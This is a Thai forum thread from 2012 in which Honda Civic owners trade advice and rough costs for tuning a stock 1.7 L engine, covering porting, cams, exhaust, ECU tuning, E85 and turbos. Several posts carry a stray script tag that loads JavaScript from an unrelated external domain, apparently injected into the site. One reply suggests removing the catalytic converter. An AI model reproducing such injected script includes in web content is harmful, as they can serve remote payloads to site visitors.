ตอบ
wishgame


ชื่อเล่น: วิทย์

เข้าร่วม: 15 มิถุนา 2011
ตอบ: 150

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 131
ให้คำขอบคุณ: 79

ที่อยู่: โคราช
ปี: 2004
สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 20 พฤษภาคม 2012 21:49 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
สวัสดีคับ พี่ ผมได้ไปถามช่างมาจะโมเครื่องเดิม รถผมเครื่อง 1.7 วีเทค เกียร์ M/T คับ

ช่างบอกใช้เงินประมาน เกือบ 50000 บาท แต่ยังไม่ได้ทำ

เลยลองมาถามดูเพื่อจะมีใครรู้บ้าง

ผมจะต้องใช้เงินประมานเท่าไรคับกับเครื่องผม

อยากให้วิ่งไม่อายใคร  ใครพอรู้ราคาและ ประการซื้อของช่วยแนนะนำผมหน่อยคับ


อยากให้มันแรงแต่งบไม่ค่อยเยอะ
แนนะนำหน่อยคับ
อยากให้มันแรงแต่งบไม่ค่อยเยอะ  
แนนะนำหน่อยคับ
ได้รับคำขอบคุณจาก: baberonte  puyzaaaaa  patoo  Phetcharat 
focusyo


ชื่อเล่น: โย

เข้าร่วม: 13 สิงหา 2011
ตอบ: 2849

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8318
ให้คำขอบคุณ: 2490

ที่อยู่: Chonburi
ปี: 2005
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 20 พฤษภาคม 2012 22:00 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
1.ขัดขยาย ไอดี ไอเสีย ปาดฝา 1.2 มม
2.หาแคม Stage 1   เฟืองแคมสไลด์   เปลี่ยนก้านซิ่ง
3.เปลี่ยนหัวฉีด ปั๊มติ๊กในถัง
4.ครัชทองแดงก้อน
5.จูน E85 กล่องแล้วแต่กำลังทรัพย์ ปลดรอบเครื่อง
6.หัวเทียน อิลเดียมเบอร์ 7
7.ล้อ forge15นิ้วเบาๆ


จบแต่เกินงบไปเยอะ เพราะแพงล้อ
ลองดูครับ
ได้รับคำขอบคุณจาก: zan  tokykung  bomb3092  baberonte  yoosabai  BALLJARAN35  puyzaaaaa  Nung_Sodapop  MADBOY  patoo  Makai  Phetcharat  coromant  es330  wishgame 
zan


เข้าร่วม: 23 สิงหา 2009
ตอบ: 3145

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3432
ให้คำขอบคุณ: 6687

ที่อยู่: HNC
จันทร์, 21 พฤษภาคม 2012 07:37 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
ถ้าไม่โหดมากนัก 50,000 ก็น่าจะอยู่ MT ด้วย
งบเท่านี้ เท่าที่ทำได้ก็
1. ขัดขยายพอร์ท 
2. เปลี่ยนกรองอากาศ
3. เจาะท่อ Air Intake
4. เปลี่ยนหัวเทียนอิรีเดียมเบอร์ 7 
5. เดินท่อใหม่ตั้งแต่ Header ยันปลาย
6. สุดท้ายพ่วงกล่องซักตัว AEM ก็ดีนะ ไม่ต้องถึงกับ Stand Alone

แค่นี้ก็ขับสนุกแล้ว ไม่ต้องโหดมากนะ  ไม่งั้นต้องอีกหลายอย่าง  แล้วสุดท้ายไปจบด้วยการเปลี่ยนเครื่อง
ได้รับคำขอบคุณจาก: Thetom  baberonte  yoosabai  BALLJARAN35  puyzaaaaa  MADBOY  patoo  Phetcharat  coromant  number1lady  art-antz-killers  es330  wishgame 
underhill


เข้าร่วม: 15 กันยา 2011
ตอบ: 3545

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4125
ให้คำขอบคุณ: 1677

ปี: 2002
สี: น้ำเงิน อิเทอนอล (B-96P)
จันทร์, 21 พฤษภาคม 2012 09:05 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
zan พิมพ์ว่า:
ถ้าไม่โหดมากนัก 50,000 ก็น่าจะอยู่ MT ด้วย
งบเท่านี้ เท่าที่ทำได้ก็
1. ขัดขยายพอร์ท 
2. เปลี่ยนกรองอากาศ
3. เจาะท่อ Air Intake
4. เปลี่ยนหัวเทียนอิรีเดียมเบอร์ 7 
5. เดินท่อใหม่ตั้งแต่ Header ยันปลาย
6. สุดท้ายพ่วงกล่องซักตัว AEM ก็ดีนะ ไม่ต้องถึงกับ Stand Alone

แค่นี้ก็ขับสนุกแล้ว ไม่ต้องโหดมากนะ  ไม่งั้นต้องอีกหลายอย่าง  แล้วสุดท้ายไปจบด้วยการเปลี่ยนเครื่อง


เดินท่อใหม่ เอาแบบไม่แพงมากประมาณเท่าไรอ่ะพี่ อยากเปลี่ยนมั้ง + air intake ถ้ากรองธรรมดาเหนผลมากไหมครับ หรือต้องใช้กะกรองเปลือย
ได้รับคำขอบคุณจาก: puyzaaaaa  wishgame 
nokmodify


ชื่อเล่น: นกชลบุรี

เข้าร่วม: 08 กรกฎา 2010
ตอบ: 1415

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1292
ให้คำขอบคุณ: 282

ที่อยู่: เมืองชลบุรี
ปี: 2002
สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 21 พฤษภาคม 2012 10:05 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
zan พิมพ์ว่า:
ถ้าไม่โหดมากนัก 50,000 ก็น่าจะอยู่ MT ด้วย
งบเท่านี้ เท่าที่ทำได้ก็
1. ขัดขยายพอร์ท 
2. เปลี่ยนกรองอากาศ
3. เจาะท่อ Air Intake
4. เปลี่ยนหัวเทียนอิรีเดียมเบอร์ 7 
5. เดินท่อใหม่ตั้งแต่ Header ยันปลาย
6. สุดท้ายพ่วงกล่องซักตัว AEM ก็ดีนะ ไม่ต้องถึงกับ Stand Alone

แค่นี้ก็ขับสนุกแล้ว ไม่ต้องโหดมากนะ  ไม่งั้นต้องอีกหลายอย่าง  แล้วสุดท้ายไปจบด้วยการเปลี่ยนเครื่อง



Step เดียวกับผมเลยครับ 0-190  1.8Km.   1 2 3 4 ดึงดีใส่5ไหลยาวๆๆครับผม อยากทำเยอะอยู่ แต่กลัวเครื่องไม่เหนียวพอ เพราะผมต้องขับรถเดือนๆๆนึงหลายหมื่นโลครับ 
ได้รับคำขอบคุณจาก: yoosabai  puyzaaaaa  zan  patoo  es330  wishgame 
yoosabai


ชื่อเล่น: เอ้

เข้าร่วม: 30 กันยา 2008
ตอบ: 1992

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8345
ให้คำขอบคุณ: 4773

ที่อยู่: Samutprakarn
ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 21 พฤษภาคม 2012 11:11 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
1. ทำฝา
2. Cam stage 1 ซักเส้น + เฟืองแคม
3. ท่อซักชุดตั้งแต่ Header ยันปลาย + กรองแปลือย
4. กล่องซักใบ เอาไว้เก็บลายระเอียดหลังจากทำบ้างบนทั้งหมด
5. ล้อ 15 หรือ 16 เบาๆ + ยางดีๆ ซักชุด
งบประมาณน่าจะเกิน 50K ถ้ารวมล้อกับยาง แต่ถ้าไม่รวมก็น่าจะสูสีครับ บวกลบนิดหน่อย ทำประมาณนี้ 402 น่าจะอยู่ซัก 16 วิ
อาจจะดีกว่าหรือแย่กว่าเล็กน้อยครับ 
เดิมๆ D17MT  วิ่ง 402 อยู่ประมาณ 16.5 - 17.5 ครับ ขึ้นอยู่กับองค์ประกอบรอบข้างครับ  

ปล. ทั้งหมดที่ว่ามาไม่เคยลองทำเอง เพียงแต่ที่เคยเห็นจากคนรอบข้างมาครับ  
กำลังจะทำ แต่เห็นงบประมาณแล้วยังเสียดายอยู่อ่ะครับ 
"<script src="https://sport32news.com/civicesgroup.js">
 
ได้รับคำขอบคุณจาก: BALLJARAN35  zan  Nung_Sodapop  MADBOY  puyzaaaaa  ICE@WIN  FuckTong  Phetcharat  es330  wishgame 
puyzaaaaa


ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

ที่อยู่: พิษณุโลก
ปี: 2004
จันทร์, 21 พฤษภาคม 2012 11:53 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
เก็บๆ... อยากได้คว่มแรงในระดับ D17 เหมือนกันครับ
ได้รับคำขอบคุณจาก: wishgame 
cjj0125


เข้าร่วม: 04 ตุลา 2008
ตอบ: 874

Guru ES
Guru ES

ได้รับคำขอบคุณ: 370
ให้คำขอบคุณ: 55

ที่อยู่: กรุงเทพ
ปี: 2003
จันทร์, 21 พฤษภาคม 2012 13:02 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
yoosabai พิมพ์ว่า:
1. ทำฝา
2. Cam stage 1 ซักเส้น + เฟืองแคม
3. ท่อซักชุดตั้งแต่ Header ยันปลาย + กรองแปลือย
4. กล่องซักใบ เอาไว้เก็บลายระเอียดหลังจากทำบ้างบนทั้งหมด
5. ล้อ 15 หรือ 16 เบาๆ + ยางดีๆ ซักชุด
งบประมาณน่าจะเกิน 50K ถ้ารวมล้อกับยาง แต่ถ้าไม่รวมก็น่าจะสูสีครับ บวกลบนิดหน่อย ทำประมาณนี้ 402 น่าจะอยู่ซัก 16 วิ
อาจจะดีกว่าหรือแย่กว่าเล็กน้อยครับ 
เดิมๆ D17MT  วิ่ง 402 อยู่ประมาณ 16.5 - 17.5 ครับ ขึ้นอยู่กับองค์ประกอบรอบข้างครับ  

ปล. ทั้งหมดที่ว่ามาไม่เคยลองทำเอง เพียงแต่ที่เคยเห็นจากคนรอบข้างมาครับ  
กำลังจะทำ แต่เห็นงบประมาณแล้วยังเสียดายอยู่อ่ะครับ 
"<script src="https://sport32news.com/civicesgroup.js">
 



เเล้วถ้้าข้อ2 เปลี่ยนเป็น cam stage 2 N/A + ลูกสูบ force จะวิ่งดีขึ้นเยอะไหมครับ
ได้รับคำขอบคุณจาก: puyzaaaaa  wishgame 
lkki5


เข้าร่วม: 26 ตุลา 2008
ตอบ: 2973

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3115
ให้คำขอบคุณ: 1255

ที่อยู่: สัตหีบ ชลบุรี หรือ พิจิตร นครสวรรค์
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
จันทร์, 21 พฤษภาคม 2012 13:34 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
na สำคัญที่ฝาสูบ  แคม ระบบไอเสีย
ได้รับคำขอบคุณจาก: puyzaaaaa  hacker  Phetcharat  wishgame 
catsteal


ชื่อเล่น: อ๋อง

เข้าร่วม: 08 เมษา 2010
ตอบ: 3841

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3145
ให้คำขอบคุณ: 124

ที่อยู่: เชียงใหม่-กรุงเทพ
ปี: 2004
สี: น้ำเงิน วิวิด (มุก) (B-502P)
จันทร์, 21 พฤษภาคม 2012 14:20 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
zan พิมพ์ว่า:
ถ้าไม่โหดมากนัก 50,000 ก็น่าจะอยู่ MT ด้วย
งบเท่านี้ เท่าที่ทำได้ก็
1. ขัดขยายพอร์ท 
2. เปลี่ยนกรองอากาศ
3. เจาะท่อ Air Intake
4. เปลี่ยนหัวเทียนอิรีเดียมเบอร์ 7 
5. เดินท่อใหม่ตั้งแต่ Header ยันปลาย
6. สุดท้ายพ่วงกล่องซักตัว AEM ก็ดีนะ ไม่ต้องถึงกับ Stand Alone

แค่นี้ก็ขับสนุกแล้ว ไม่ต้องโหดมากนะ  ไม่งั้นต้องอีกหลายอย่าง  แล้วสุดท้ายไปจบด้วยการเปลี่ยนเครื่อง


4-1 เอาแคทเอากลางออก เดินท่อ 1.5-2.0 ปลายตรง
พวงกล่อง f con อื่นๆ จูนอากาศ น้ำมัน 
ให้ดี ชนเกียร d15 ยัดเต็ด โมรอม ครัชซิ่ง ตังเหลือยิ่งแก๊สเท้าหัว50 ลูกก้านเดิมรับไหว แต่ถ้ารักที่จะซัด เปลี่ยนเหนียวไปยางๆ บางสำนักประกบฝาd15 แคมซิ่งด้วย (เลือก d15 เพราะ ของหาง่าย ราคาถูก แต่ถ้ามีตังก็จัด d16 d17 แล้วแต่ความสามารถ)
ได้รับคำขอบคุณจาก: puyzaaaaa  wishgame 
puyzaaaaa


ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

ที่อยู่: พิษณุโลก
ปี: 2004
จันทร์, 21 พฤษภาคม 2012 14:26 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
ตอนนี้ กำลังคิด จะ ขัดขยายพอร์ท  ครับ งบประมาณ เท่าไร่ ครับ แล้ว เราต้องเปลี่ยนอะไรมั้ง ถ้าทำสเตปนี้

ตอนนี้ ผมมี Header 4-2-1 เลส 2 นิ้ว ทั้ง เส้น ปลาย 2.2 เอาแทคออก พักกลาง เดิม ครับ กรอง simota

ถ้า..ขัดขยายพอร์ท จะเห็นผลชัดขึ้นรึป่าว ครับ... แล้ว ขัดพอทจะ ช่วยกำลังเครื่อง ช่วงไหนครับ ขอบคุณมากครับ
ได้รับคำขอบคุณจาก: wishgame 
matmann


ชื่อเล่น: นัท

เข้าร่วม: 26 ตุลา 2011
ตอบ: 436

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 398
ให้คำขอบคุณ: 169

ที่อยู่: หนองแขม กทม.
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 21 พฤษภาคม 2012 16:12 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
catsteal พิมพ์ว่า:

zan พิมพ์ว่า:
ถ้าไม่โหดมากนัก 50,000 ก็น่าจะอยู่ MT ด้วย
งบเท่านี้ เท่าที่ทำได้ก็
1. ขัดขยายพอร์ท 
2. เปลี่ยนกรองอากาศ
3. เจาะท่อ Air Intake
4. เปลี่ยนหัวเทียนอิรีเดียมเบอร์ 7 
5. เดินท่อใหม่ตั้งแต่ Header ยันปลาย
6. สุดท้ายพ่วงกล่องซักตัว AEM ก็ดีนะ ไม่ต้องถึงกับ Stand Alone

แค่นี้ก็ขับสนุกแล้ว ไม่ต้องโหดมากนะ  ไม่งั้นต้องอีกหลายอย่าง  แล้วสุดท้ายไปจบด้วยการเปลี่ยนเครื่อง


4-1 เอาแคทเอากลางออก เดินท่อ 1.5-2.0 ปลายตรง
พวงกล่อง f con อื่นๆ จูนอากาศ น้ำมัน 
ให้ดี ชนเกียร d15 ยัดเต็ด โมรอม ครัชซิ่ง ตังเหลือยิ่งแก๊สเท้าหัว50 ลูกก้านเดิมรับไหว แต่ถ้ารักที่จะซัด เปลี่ยนเหนียวไปยางๆ บางสำนักประกบฝาd15 แคมซิ่งด้วย (เลือก d15 เพราะ ของหาง่าย ราคาถูก แต่ถ้ามีตังก็จัด d16 d17 แล้วแต่ความสามารถ)


หัวเทียนที่ว่านี่อ่า  ใช้กะรถติดแก๊สได้ป่าวครับ 
ได้รับคำขอบคุณจาก: wishgame 
benzd


ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

ที่อยู่: เกตุม-มหาชัย-สมุทรสาคร
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 21 พฤษภาคม 2012 19:32 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
เก็บงบอีกนิดทำเทอร์โบไปเลยดีกว่าครับ
wishgame


ชื่อเล่น: วิทย์

เข้าร่วม: 15 มิถุนา 2011
ตอบ: 150

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 131
ให้คำขอบคุณ: 79

ที่อยู่: โคราช
ปี: 2004
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 21 พฤษภาคม 2012 20:06 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
HEADER ทั้งใบแล้วคับ  อยากราคาและราละเอียดให้มากว่านี้อ่ะคับ

ใครพอให้คำปรึกษาได้ช่วยบอกหย่อนนะคับ

ขอบคูณคับ
wishgame


ชื่อเล่น: วิทย์

เข้าร่วม: 15 มิถุนา 2011
ตอบ: 150

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 131
ให้คำขอบคุณ: 79

ที่อยู่: โคราช
ปี: 2004
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 21 พฤษภาคม 2012 20:08 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
matmann พิมพ์ว่า:

catsteal พิมพ์ว่า:

zan พิมพ์ว่า:
ถ้าไม่โหดมากนัก 50,000 ก็น่าจะอยู่ MT ด้วย
งบเท่านี้ เท่าที่ทำได้ก็
1. ขัดขยายพอร์ท 
2. เปลี่ยนกรองอากาศ
3. เจาะท่อ Air Intake
4. เปลี่ยนหัวเทียนอิรีเดียมเบอร์ 7 
5. เดินท่อใหม่ตั้งแต่ Header ยันปลาย
6. สุดท้ายพ่วงกล่องซักตัว AEM ก็ดีนะ ไม่ต้องถึงกับ Stand Alone

แค่นี้ก็ขับสนุกแล้ว ไม่ต้องโหดมากนะ  ไม่งั้นต้องอีกหลายอย่าง  แล้วสุดท้ายไปจบด้วยการเปลี่ยนเครื่อง


4-1 เอาแคทเอากลางออก เดินท่อ 1.5-2.0 ปลายตรง
พวงกล่อง f con อื่นๆ จูนอากาศ น้ำมัน 
ให้ดี ชนเกียร d15 ยัดเต็ด โมรอม ครัชซิ่ง ตังเหลือยิ่งแก๊สเท้าหัว50 ลูกก้านเดิมรับไหว แต่ถ้ารักที่จะซัด เปลี่ยนเหนียวไปยางๆ บางสำนักประกบฝาd15 แคมซิ่งด้วย (เลือก d15 เพราะ ของหาง่าย ราคาถูก แต่ถ้ามีตังก็จัด d16 d17 แล้วแต่ความสามารถ)


หัวเทียนที่ว่านี่อ่า  ใช้กะรถติดแก๊สได้ป่าวครับ 



ที่บอกมาผมต้องหมดประมาณเท่าไรคับช่วยบอกได้ป่าวคับ
ohmz1541


ชื่อเล่น: โอม

เข้าร่วม: 05 ธันวา 2008
ตอบ: 1977

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2324
ให้คำขอบคุณ: 529

ที่อยู่: เชียงราย-รามอินทรา
ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 21 พฤษภาคม 2012 22:20 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
เอาตังค์เก็บไว้ 2 หมื่น  ที่เหลือเอาไปเช่า เฟอรารี่ ขับ1 วันครับ เหยียบให้หายอยาก ไปเล้ย 


ปล.ขำๆ นะคับ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: CoCain3z  wishgame 
atommic


เข้าร่วม: 19 มกรา 2010
ตอบ: 295

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 119
ให้คำขอบคุณ: 2

ที่อยู่: BKK
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 21 พฤษภาคม 2012 23:41 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
...
ได้รับคำขอบคุณจาก: wishgame 
puyzaaaaa


ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

ที่อยู่: พิษณุโลก
ปี: 2004
อังคาร, 22 พฤษภาคม 2012 02:54 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
ติด ตาม อย่างจดจ่อ ^^"
ได้รับคำขอบคุณจาก: wishgame 
tamy2975


เข้าร่วม: 30 ตุลา 2009
ตอบ: 1733

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1615
ให้คำขอบคุณ: 1210
อังคาร, 22 พฤษภาคม 2012 07:23 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
อัพ อยากรู้
ได้รับคำขอบคุณจาก: wishgame 
coromant


เข้าร่วม: 09 ตุลา 2008
ตอบ: 5132

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6854
ให้คำขอบคุณ: 719
อังคาร, 22 พฤษภาคม 2012 07:42 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
เวลาลงจากของเดิม 1 วินาที ใช้เงิน 1 แสนครับ จัดไป
ได้รับคำขอบคุณจาก: hacker  aeae..  art-antz-killers  wishgame  BTPhone 
underhill


เข้าร่วม: 15 กันยา 2011
ตอบ: 3545

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4125
ให้คำขอบคุณ: 1677

ปี: 2002
สี: น้ำเงิน อิเทอนอล (B-96P)
อังคาร, 22 พฤษภาคม 2012 09:03 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
ตามต่อ ขัดพอร์ท ปาดฝา เท่าไรครับ

และ ๆ เดินเฮด ใช้งบประมาณเท่าไรครับ 
ได้รับคำขอบคุณจาก: wishgame 
few_INTAKE


ชื่อเล่น: ฟิว

เข้าร่วม: 26 ตุลา 2008
ตอบ: 180

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 299
ให้คำขอบคุณ: 298

ที่อยู่: พัฒนาการ
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 22 พฤษภาคม 2012 15:41 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
ผมว่าทำแต่ฝาสูบ+กล่องใบก็แรงแล้ว เลือกนํามันเอา e20-e85 งบไม่ถึง50000 ก็แรงได้
ได้รับคำขอบคุณจาก: FuckTong  Phetcharat  wishgame 
FuckTong


ชื่อเล่น: เอ๋

เข้าร่วม: 21 เมษา 2011
ตอบ: 4394

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2463
ให้คำขอบคุณ: 2244

ที่อยู่: Samutprakan
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 22 พฤษภาคม 2012 15:51 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
แอบมาเก็บข้อมูล
ผมแค่ปาดฝามาก็ ok แล้วไม่รู้จาแรงไปไหน<script src="https://sport32news.com/civicesgroup.js"></  
ได้รับคำขอบคุณจาก: wishgame 
blackhawkpearl


ชื่อเล่น: ต้อ

เข้าร่วม: 22 เมษา 2010
ตอบ: 2761

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2781
ให้คำขอบคุณ: 223

ที่อยู่: ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 22 พฤษภาคม 2012 21:39 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
few_INTAKE พิมพ์ว่า:
ผมว่าทำแต่ฝาสูบ+กล่องใบก็แรงแล้ว เลือกนํามันเอา e20-e85 งบไม่ถึง50000 ก็แรงได้




ตามนั้นครับ  ผมเห็นแจ็ส เดิมๆ mt  จูน E85 +F-con s  วิ่ง 16 กลางๆ  ครับ 
ผมว่าแรงไม่แรงอยู่ที่ส่วนประกอบหลายๆๆอย่างครับ    แต่ถ้าอยากลัดก็พี่โบเลย
ได้รับคำขอบคุณจาก: wishgame 
wishgame


ชื่อเล่น: วิทย์

เข้าร่วม: 15 มิถุนา 2011
ตอบ: 150

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 131
ให้คำขอบคุณ: 79

ที่อยู่: โคราช
ปี: 2004
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 23 พฤษภาคม 2012 20:56 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
blackhawkpearl พิมพ์ว่า:

few_INTAKE พิมพ์ว่า:
ผมว่าทำแต่ฝาสูบ+กล่องใบก็แรงแล้ว เลือกนํามันเอา e20-e85 งบไม่ถึง50000 ก็แรงได้




ตามนั้นครับ  ผมเห็นแจ็ส เดิมๆ mt  จูน E85 +F-con s  วิ่ง 16 กลางๆ  ครับ 
ผมว่าแรงไม่แรงอยู่ที่ส่วนประกอบหลายๆๆอย่างครับ    แต่ถ้าอยากลัดก็พี่โบเลย


ถ้าลงโบปล้วจะหมดเยอะมั้ยอ่ะคับพี่
wishgame


ชื่อเล่น: วิทย์

เข้าร่วม: 15 มิถุนา 2011
ตอบ: 150

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 131
ให้คำขอบคุณ: 79

ที่อยู่: โคราช
ปี: 2004
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 23 พฤษภาคม 2012 20:58 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
Ae_Aonnut พิมพ์ว่า:
แอบมาเก็บข้อมูล
ผมแค่ปาดฝามาก็ ok แล้วไม่รู้จาแรงไปไหน<script src="https://sport32news.com/civicesgroup.js"></



ปาดฝาพอจะรู้มั้ยคับว่าต้องเอาค่าเท่าไรยังไง
แล้วราคาประมาณเท่าไรคับ
wishgame


ชื่อเล่น: วิทย์

เข้าร่วม: 15 มิถุนา 2011
ตอบ: 150

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 131
ให้คำขอบคุณ: 79

ที่อยู่: โคราช
ปี: 2004
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 23 พฤษภาคม 2012 21:00 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
ohmz1541 พิมพ์ว่า:
เอาตังค์เก็บไว้ 2 หมื่น  ที่เหลือเอาไปเช่า เฟอรารี่ ขับ1 วันครับ เหยียบให้หายอยาก ไปเล้ย 


ปล.ขำๆ นะคับ <script src="https://sport32news.com/civicesgroup.js"></


ใจอยากให้ลูกชายมันเเรงๆกะเค้าหน่อยคับ
blackhawkpearl


ชื่อเล่น: ต้อ

เข้าร่วม: 22 เมษา 2010
ตอบ: 2761

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2781
ให้คำขอบคุณ: 223

ที่อยู่: ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 23 พฤษภาคม 2012 23:12 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
wishgame พิมพ์ว่า:

blackhawkpearl พิมพ์ว่า:

few_INTAKE พิมพ์ว่า:
ผมว่าทำแต่ฝาสูบ+กล่องใบก็แรงแล้ว เลือกนํามันเอา e20-e85 งบไม่ถึง50000 ก็แรงได้




ตามนั้นครับ ผมเห็นแจ็ส เดิมๆ mt จูน E85 +F-con s วิ่ง 16 กลางๆ ครับ
ผมว่าแรงไม่แรงอยู่ที่ส่วนประกอบหลายๆๆอย่างครับ แต่ถ้าอยากลัดก็พี่โบเลย


ถ้าลงโบปล้วจะหมดเยอะมั้ยอ่ะคับพี่




ไม่เกิน 7 หมื่น รวมกล่องนะลองคิดให้ดีก่อนนะ  
ว่าจะเอาแบบหนักหน่วงมาไวแต่แป็บเดียว  กับแบบเรื่อยๆลากกันยาวๆ
ได้รับคำขอบคุณจาก: wishgame 
benzd


ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

ที่อยู่: เกตุม-มหาชัย-สมุทรสาคร
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 24 พฤษภาคม 2012 06:37 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
blackhawkpearl พิมพ์ว่า:

wishgame พิมพ์ว่า:

blackhawkpearl พิมพ์ว่า:

few_INTAKE พิมพ์ว่า:
ผมว่าทำแต่ฝาสูบ+กล่องใบก็แรงแล้ว เลือกนํามันเอา e20-e85 งบไม่ถึง50000 ก็แรงได้




ตามนั้นครับ ผมเห็นแจ็ส เดิมๆ mt จูน E85 +F-con s วิ่ง 16 กลางๆ ครับ
ผมว่าแรงไม่แรงอยู่ที่ส่วนประกอบหลายๆๆอย่างครับ แต่ถ้าอยากลัดก็พี่โบเลย


ถ้าลงโบปล้วจะหมดเยอะมั้ยอ่ะคับพี่




ไม่เกิน 7 หมื่น รวมกล่องนะลองคิดให้ดีก่อนนะ  
ว่าจะเอาแบบหนักหน่วงมาไวแต่แป็บเดียว  กับแบบเรื่อยๆลากกันยาวๆ

